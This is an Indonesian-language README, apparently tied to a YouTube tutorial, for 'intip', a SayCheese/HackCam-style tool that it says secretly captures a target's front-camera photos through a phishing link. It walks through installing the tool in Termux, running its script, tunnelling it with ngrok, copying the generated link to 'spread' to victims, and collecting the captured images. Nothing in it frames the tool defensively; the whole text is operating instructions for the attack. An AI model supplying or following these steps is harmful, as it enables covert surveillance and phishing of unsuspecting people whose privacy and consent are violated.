YT : DIKY AUTIS 🗿


# TOOL INTIP ADALAH TOOL HACKCAM / SAYCHEESE
YANG BERFUNGSI MENGAKSES KAMERA DEPAN TARGET
DENGAN METODE LINK PHISING YANG AKAN KITA KIRIM KE TARGET.


- Jika belum punya script & akun Ngrok
  silahkan regis & download dulu,
  buat temen2 yg gatau download Ngrok gimana,
  silahkan cari video sebelumnya cara install ngrok.


- Untuk cara installasi "intip" Sebagai berikut :
    
    "Buka FileExplore"
       
     * unzip file script "intip_fix_saycheese.zip" taruh diluar folder /sdcard/disini
     
     "Buka Termux"
      
 Ketik :
       
       $ apt update
       $ apt upgrade
       $ pkg install php
       $ pkg install curl
       $ termux-setup-storage (pilih aja Y)
       
- Untuk pengoperasian "intip" sebagai berikut :

   * sesi 1
   
      $ cd
      $ cd /sdcard
      $ cd intip
      $ bash kampret.sh
      
      Sampai di menu intip, jangan START dulu.
      
      Selanjutnya :
      ( buka sesi baru dan aktifkan Ngrok )
      ( jangan lupa hotspot harus aktif )
      
   * sesi 2
       
      $ cd
      $ ./ngrok http 3333 (tunggu sampai online)
      
      ( jika Ngrok sudah aktif, kembali ke sesi intip)
     
     # pilih angka 1, Enter
     # tunggu sampai keluar direct linknya lalu salin
     # link siap di sebar
     
- Untuk melihat hasil tangkapan, buka file manager
- buka folder "intip"

  Sekian ☺ kalo masih bingung, tonton aja videonya lagi dengan teliti.
  
  🙏 sebelumnya terimakasih
        mathurnuwun buat temen2
        yang udah subscribe 🤘
